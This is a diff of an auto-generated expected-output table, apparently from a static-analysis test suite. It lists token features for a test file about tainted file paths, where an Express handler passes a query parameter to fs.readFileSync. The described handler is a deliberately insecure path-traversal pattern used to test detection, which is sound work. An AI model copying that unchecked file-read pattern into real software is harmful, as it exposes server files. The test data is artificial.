autogenerated/TaintedPath/normalizedPaths.js:353:1:353:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:353:1:353:3 | app | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:353:1:353:7 | app.get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:353:1:353:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:353:1:353:7 | app.get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:353:1:373:2 | app.get ... \\n }\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:353:1:373:2 | app.get ... \\n }\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:353:1:373:2 | app.get ... \\n }\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:353:1:373:2 | exceptional return of app.get ... \\n }\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:353:1:373:2 | exceptional return of app.get ... \\n }\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:353:1:373:2 | exceptional return of app.get ... \\n }\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:353:5:353:7 | get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:353:5:353:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:353:5:353:7 | get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:353:9:353:30 | '/yet-a ... refix2' | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:353:9:353:30 | '/yet-a ... refix2' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:353:9:353:30 | '/yet-a ... refix2' | calleeImports | express | @@ -9527,6 +78555,26 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:353:9:353:30 | '/yet-a ... refix2' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/normalizedPaths.js:353:9:353:30 | '/yet-a ... refix2' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:353:9:353:30 | '/yet-a ... refix2' | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:353:33:353:32 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:353:33:353:32 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:353:33:353:32 | fs | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:353:33:353:32 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:353:33:353:32 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:353:33:353:32 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:353:33:353:32 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:353:33:353:32 | pathModule | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:353:33:353:32 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:353:33:353:32 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:353:33:353:32 | rootPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:353:33:353:32 | rootPath | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:353:33:353:32 | rootPath | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:353:33:353:32 | rootPath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:353:33:353:32 | rootPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:353:33:373:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:353:33:373:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:353:33:373:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:353:33:373:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:353:33:373:1 | 'arguments' object of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:353:33:373:1 | (req, r ... ;\\n }\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:353:33:373:1 | (req, r ... ;\\n }\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/normalizedPaths.js:353:33:373:1 | (req, r ... ;\\n }\\n} | calleeImports | express | @@ -9534,6 +78582,96 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:353:33:373:1 | (req, r ... ;\\n }\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:353:33:373:1 | (req, r ... ;\\n }\\n} | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:353:33:373:1 | (req, r ... ;\\n }\\n} | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:353:33:373:1 | exceptional return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:353:33:373:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:353:33:373:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:353:33:373:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:353:33:373:1 | exceptional return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:353:33:373:1 | return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:353:33:373:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:353:33:373:1 | return of anonymous function | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:353:33:373:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:353:33:373:1 | return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:353:34:353:36 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:353:34:353:36 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:353:34:353:36 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:353:34:353:36 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:353:34:353:36 | req | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:353:34:353:36 | req | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:353:34:353:36 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:353:34:353:36 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:353:34:353:36 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:353:34:353:36 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:353:39:353:41 | res | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:353:39:353:41 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:353:39:353:41 | res | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:353:39:353:41 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:353:39:353:41 | res | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:354:7:354:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:354:7:354:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:354:7:354:10 | path | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:354:7:354:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:354:7:354:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:354:7:354:27 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:354:7:354:27 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:354:7:354:27 | path | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:354:7:354:27 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:354:7:354:27 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:354:7:354:27 | path = ... ry.path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:354:7:354:27 | path = ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:354:7:354:27 | path = ... ry.path | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:354:7:354:27 | path = ... ry.path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:354:7:354:27 | path = ... ry.path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:354:14:354:16 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:354:14:354:16 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:354:14:354:16 | req | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:354:14:354:16 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:354:14:354:16 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:354:14:354:22 | req.query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:354:14:354:22 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:354:14:354:22 | req.query | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:354:14:354:22 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:354:14:354:22 | req.query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:354:14:354:27 | req.query.path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:354:14:354:27 | req.query.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:354:14:354:27 | req.query.path | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:354:14:354:27 | req.query.path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:354:14:354:27 | req.query.path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:354:18:354:22 | query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:354:18:354:22 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:354:18:354:22 | query | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:354:18:354:22 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:354:18:354:22 | query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:354:24:354:27 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:354:24:354:27 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:354:24:354:27 | path | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:354:24:354:27 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:354:24:354:27 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:356:3:356:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:356:3:356:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:356:3:356:4 | fs | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:356:3:356:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:356:3:356:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:356:3:356:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:356:3:356:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:356:3:356:17 | fs.readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:356:3:356:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:356:3:356:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:356:3:356:23 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:356:3:356:23 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:356:3:356:23 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:356:3:356:23 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:356:3:356:23 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:356:3:356:23 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:356:3:356:23 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:356:3:356:23 | fs.read ... c(path) | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:356:3:356:23 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:356:3:356:23 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:356:6:356:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:356:6:356:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:356:6:356:17 | readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:356:6:356:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:356:6:356:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:356:19:356:22 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:356:19:356:22 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:356:19:356:22 | path | calleeImports | fs | @@ -9543,6 +78681,46 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:356:19:356:22 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:356:19:356:22 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:356:19:356:22 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:358:7:358:17 | requestPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:358:7:358:17 | requestPath | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:358:7:358:17 | requestPath | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:358:7:358:17 | requestPath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:358:7:358:17 | requestPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:358:7:358:51 | request ... , path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:358:7:358:51 | request ... , path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:358:7:358:51 | request ... , path) | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:358:7:358:51 | request ... , path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:358:7:358:51 | request ... , path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:358:7:358:51 | requestPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:358:7:358:51 | requestPath | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:358:7:358:51 | requestPath | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:358:7:358:51 | requestPath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:358:7:358:51 | requestPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:358:21:358:30 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:358:21:358:30 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:358:21:358:30 | pathModule | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:358:21:358:30 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:358:21:358:30 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:358:21:358:35 | pathModule.join | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:358:21:358:35 | pathModule.join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:358:21:358:35 | pathModule.join | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:358:21:358:35 | pathModule.join | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:358:21:358:35 | pathModule.join | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:358:21:358:51 | exceptional return of pathMod ... , path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:358:21:358:51 | exceptional return of pathMod ... , path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:358:21:358:51 | exceptional return of pathMod ... , path) | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:358:21:358:51 | exceptional return of pathMod ... , path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:358:21:358:51 | exceptional return of pathMod ... , path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:358:21:358:51 | pathMod ... , path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:358:21:358:51 | pathMod ... , path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:358:21:358:51 | pathMod ... , path) | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:358:21:358:51 | pathMod ... , path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:358:21:358:51 | pathMod ... , path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:358:32:358:35 | join | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:358:32:358:35 | join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:358:32:358:35 | join | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:358:32:358:35 | join | 